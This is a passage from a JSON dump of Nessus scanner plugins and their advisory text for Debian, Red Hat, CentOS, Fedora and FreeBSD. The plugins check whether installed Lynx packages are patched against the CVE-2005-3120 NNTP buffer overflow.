During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-876\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lynx-ssl package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1 of lynx.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lynx-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lynx-ssl\", reference:\"2.8.4.1b-3.2\")) flag++;\nif 
(deb_check(release:\"3.1\", prefix:\"lynx-ssl\", reference:\"2.8.5-2sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:52:37", "bulletinFamily": "scanner", "description": "An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2005-803.NASL", "href": "https://www.tenable.com/plugins/nessus/20051", "published": "2005-10-19T00:00:00", "title": "RHEL 2.1 / 3 / 4 : lynx (RHSA-2005:803)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:803. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20051);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:11\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_bugtraq_id(15117);\n script_xref(name:\"RHSA\", value:\"2005:803\");\n\n script_name(english:\"RHEL 2.1 / 3 / 4 : lynx (RHSA-2005:803)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. 
The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:803\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:803\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"lynx-2.8.4-18.1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"lynx-2.8.5-11.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"lynx-2.8.5-18.1\")) flag++;\n\n if (flag)\n {\n 
security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:40:50", "bulletinFamily": "scanner", "description": "An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.", "modified": "2019-12-02T00:00:00", "id": "CENTOS_RHSA-2005-803.NASL", "href": "https://www.tenable.com/plugins/nessus/21863", "published": "2006-07-03T00:00:00", "title": "CentOS 3 / 4 : lynx (CESA-2005:803)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:803 and \n# CentOS Errata and Security Advisory 2005:803 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21863);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/10/25 13:36:03\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_bugtraq_id(15117);\n script_xref(name:\"RHSA\", value:\"2005:803\");\n\n script_name(english:\"CentOS 3 / 4 : lynx (CESA-2005:803)\");\n script_summary(english:\"Checks rpm output for the 
updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32cf0cb0\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?91ed8dc4\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012292.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4e05709\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012293.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?11a72566\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?26ff1972\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-October/012321.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?132e0a60\"\n );\n 
script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"lynx-2.8.5-11.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"lynx-2.8.5-18.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:01:19", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-874.NASL", "href": "https://www.tenable.com/plugins/nessus/22740", "published": "2006-10-14T00:00:00", "title": "Debian DSA-874-1 : lynx - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-874. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22740);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:19\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"DSA\", value:\"874\");\n\n script_name(english:\"Debian DSA-874-1 : lynx - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-874\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lynx package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2005/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lynx\", reference:\"2.8.4.1b-3.3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lynx\", reference:\"2.8.5-2sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:02:58", "bulletinFamily": "scanner", "description": "This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2005-994.NASL", "href": "https://www.tenable.com/plugins/nessus/20028", "published": "2005-10-19T00:00:00", "title": "Fedora Core 4 : lynx-2.8.5-23.1 (2005-994)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-994.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20028);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:24\");\n\n script_xref(name:\"FEDORA\", value:\"2005-994\");\n\n script_name(english:\"Fedora Core 4 : lynx-2.8.5-23.1 (2005-994)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This package fixes a security bug (CVE-2005-3120) when handling\nconnections to NNTP (news) servers.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-October/001494.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65aae8ae\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lynx and / or lynx-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lynx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"lynx-2.8.5-23.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"lynx-debuginfo-2.8.5-23.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx / lynx-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:31:55", "bulletinFamily": "scanner", "description": "Ulf Harnhammar reports :\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. 
However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow.", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "href": "https://www.tenable.com/plugins/nessus/21506", "published": "2006-05-13T00:00:00", "title": "FreeBSD : lynx -- remote buffer overflow (c01170bf-4990-11da-a1b8-000854d03344)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21506);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:37\");\n\n script_cve_id(\"CVE-2005-3120\");\n\n script_name(english:\"FreeBSD : lynx -- remote buffer overflow (c01170bf-4990-11da-a1b8-000854d03344)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar reports :\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. 
However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow.\"\n );\n # http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a40354e4\"\n );\n # https://vuxml.freebsd.org/freebsd/c01170bf-4990-11da-a1b8-000854d03344.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1447932b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lynx-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lynx<2.8.5_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"lynx>2.8.6*<2.8.6d14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-lynx<2.8.5_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-lynx>2.8.6*<2.8.6d14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"lynx-ssl<2.8.5_1\")) flag++;\n\nif 